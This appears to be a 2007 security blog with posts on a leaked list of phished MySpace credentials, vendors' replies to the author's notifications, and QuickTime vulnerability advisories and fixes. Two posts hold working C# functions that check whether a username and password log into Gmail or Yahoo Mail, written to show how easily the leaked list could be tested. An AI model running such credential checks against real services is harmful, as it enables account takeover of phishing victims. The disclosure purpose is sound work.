If at first you don't succeed; call it version 1.0
Friday, January 26, 2007

Almost two weeks after I've sent the first mails, and after sending two more follow-up mails asking if there are any updates regarding this issue, I got only one more response - from Google.
Google's response was somewhat vague:


Hello,
Thanks for your report. We apologize for any inconvenience this may have caused.
When we are notified of such issues, we investigate and take appropriate action if we find that the Gmail Terms of Use have been violated. To read the Gmail Terms of Use, please visit:
http://mail.google.com/gmail/help/terms_of_use.html.
We appreciate your concern, and thank you for taking the time to send us your comments.
Sincerely,
The Google Team


From Gmail’s terms of use:  “…Before you register for your Gmail account, you must read and agree to these Gmail Terms of Use and the following terms and conditions and policies, including any future amendments…”.

I’m not an attorney and I didn’t go to any law school, but from what I can understand from the first line of the terms is that  these “terms of use” are only for Gmail registered users.  So, if an attacker will brute force the MySpace phishing list and will find a valid Gmail username/password and use it, he will not violate these terms because he hasn’t registered to that account and therefore he doesn’t need to read or agree to the terms. I’ve sent this comment to Google.

I'm still waiting for a respond from Yahoo and Microsoft.
Again, to demonstrate how easy it is to extract a valid username/password from the phishers list, the following is a modified version of the Gmail account validator. This time, for Yahoo! Mail:

// Returns 1 if valid username/password, 0 if invalid, -1 if unknown
private static int IsValidYahooMailLogin(string username, string password)
{
   HttpWebRequest request = (HttpWebRequest)HttpWebRequest.Create("https://login.yahoo.com/config/login?");
   request.CookieContainer = new CookieContainer();
   request.Method = "POST";
   request.Referer = "https://login.yahoo.com/config/login?";
   request.ContentType = "application/x-www-form-urlencoded";
   string data = ".tries=2&.src=ym&.md5=&.hash=&.js=&.last=&promo=&.intl=us&.bypass=&" +
".partner=&.u=chn9vfp2qnpl1&.v=0&.challenge=&.yplus=&.emailCode=&pkg=" +
"&stepid=&.ev=&hasMsgr=1&.chkP=Y&.done=http%3A%2F%2Fmail.yahoo.com&.pd=ym_ver%253d0&login="
+ username + "&passwd=" + password + "&.save=Sign+In";
   request.ContentLength = data.Length;
   StreamWriter reqStream = new StreamWriter(request.GetRequestStream());
   reqStream.Write(data, 0, data.Length);
   reqStream.Close();
   HttpWebResponse response = (HttpWebResponse)request.GetResponse();
   StreamReader sr = new StreamReader(response.GetResponseStream());
   string resp = sr.ReadToEnd();
   sr.Close();
   response.Close();
   return (resp.IndexOf("location.replace") > -1) ? 1 : (resp.IndexOf("Invalid ID or password.") > -1 || resp.IndexOf("This ID is not yet taken.") > -1) ? 0 : -1;
}


Friday, January 26, 2007 3:15:30 PM UTC | Comments [0] | .NET | Security#
Tuesday, January 16, 2007

Yesterday, a huge list of MySpace accounts’ usernames and passwords was revealed to the public. This list was harvested by phishers.
Most of those MySpace accounts’ usernames are emails of the following webmail accounts: GMAIL, Hotmail, Yahoo! Mail and AOL.
Some of those poor MySpace users are probably using the same password in their MySpace account for their webmail account, and probably for other web services too (ebay/Amazon/etc).
Brute forcing those web services to extract the valid credentials from the phishers list is very easy. So, I’ve decided to first contact the webmail vendors (Google, Microsoft, Yahoo and AOL) and ask them to analyze the phishers list against their own database in order to warn the poor users to change their passwords as soon as possible.
Over 21 hours later, and only AOL have responded to my suggestion/request.
AOL's response (10 minutes after I’ve sent the mail!) :


Hi Aviv,

Thank you for the notification.  We noticed this on the Full-Disclosure list as well.  We will do everything we can to protect these users.

Thank you,

Kent L.
AOL Product Vulnerabilities


Just to demonstrate how easy is to extract the valid username/password from the phishers list, the following are 20 lines of C# code which validates username and password of a GMAIL account:

// Returns 1 if valid username/password, 0 if invalid, -1 if unknown
private static int IsValidGmailLogin(string username, string password)
{
   HttpWebRequest request = (HttpWebRequest)HttpWebRequest.Create("https://www.google.com/accounts/ServiceLoginAuth");
   request.CookieContainer = new CookieContainer();
   request.Method = "POST";
   request.Referer = "https://www.google.com/accounts/ServiceLogin";
   request.ContentType = "application/x-www-form-urlencoded";
   string data = "?service=mail&Email=" + username + "&Passwd=" + password + "&rm=false&null=Sign%20in&continue=https://mail.google.com/mail?ui=html&zy=l";
   request.ContentLength = data.Length;
   StreamWriter reqStream = new StreamWriter(request.GetRequestStream());
   reqStream.Write(data, 0, data.Length);
   reqStream.Close();
   HttpWebResponse response = (HttpWebResponse)request.GetResponse();
   StreamReader sr = new StreamReader(response.GetResponseStream());
   string resp = sr.ReadToEnd();
   sr.Close();
   response.Close();
   return (resp.IndexOf("location.href") > -1) ? 1 : (resp.IndexOf("<form action=\"LoginAuth\"") > -1) ? 0 : -1;
}


Tuesday, January 16, 2007 7:04:06 PM UTC | Comments [1] | .NET | Security#
Friday, January 05, 2007

As I’ve already mentioned in the third "Month of Apple Bugs" advisory, the QuickTime HREFTrack feature, which was exploited in the last MySpace worm, is vulnerable to cross-zone scripting attacks.
Landon Fuller, who have decided to publish fixes for the bugs disclosed in the "Month of Apple Bugs", has provided a fix for this vulnerability a few hours after it was published.
This fix, which blocked referencing the javascript protocol handler in the HREFTrack attribute, was aimed to fix the cross-site scripting vulnerability. Again, this specific vulnerability was previously disclosed by pdp, and was exploited in the MySpace worm. This is a different vulnerability, and although this fix was better than the fix apple provided (which probably only prevented the MySpace worm), it didn’t fix the vulnerability I disclosed in MoAB #3.

Today, after exchanging mails with Landon Fuller, he published a new version of this fix. This time, instead of black-listing the javascript protocol handler, he white-listed only the protocol handlers that were supposed to be referenced in the HREFTrack attribute (http, https and ftp).

This updated fix, although it seems to be only for Macintosh users, should prevent exploitation of this issue on that platform. Good job Landon!
We’ll now have to wait for an official cross-platform fix from Apple, or maybe a cross-platform “Month of Apple Fixes” initiative.

P.S.
This fix patches the rNPN_GetURL() function. If this patch is global for both the QuickTime plug-in and the QuickTime player, it should also prevent exploitation of the .qtl cross-zone scripting vulnerability that was also previously disclosed by pdp.


Friday, January 05, 2007 10:02:51 AM UTC | Comments [5] | Security#
Wednesday, January 03, 2007

A month ago, a vulnerability in QuickTime was exploited to spread a worm in MySpace. The vulnerability was first published by pdp. In his article, pdp describes how HREFTrack attribute in .mov files can be used for malicious scripting. The MySpace worm abused this vulnerability in a cross-site scripting attack vector.

This MoAB issue shows that this vulnerability can also be used in a cross-zone scripting attack which could allow, in combination with other vulnerabilities, to remotely execute arbitrary code on the user's machine, as well as disclosure of the filesystem contents.

Proof-of-Concept code and more information can be found at MoAB #3.


Wednesday, January 03, 2007 10:38:19 PM UTC | Comments [2] | Security#
Monday, January 01, 2007

Happy new year! "Month of Apple Bugs" is here!

Enjoy the first vulnerability: Apple Quicktime rtsp URL Handler Stack-based Buffer Overflow.

More to come...


Monday, January 01, 2007 6:59:39 PM UTC | Comments [1] | Security#
Send me an Email
Follow me on Twitter
RSS Feeds
  
Blogroll
Archive
Admin Login
Sign In
Disclaimer
The opinions expressed herein are my own personal opinions and do not represent my employer's view in anyway.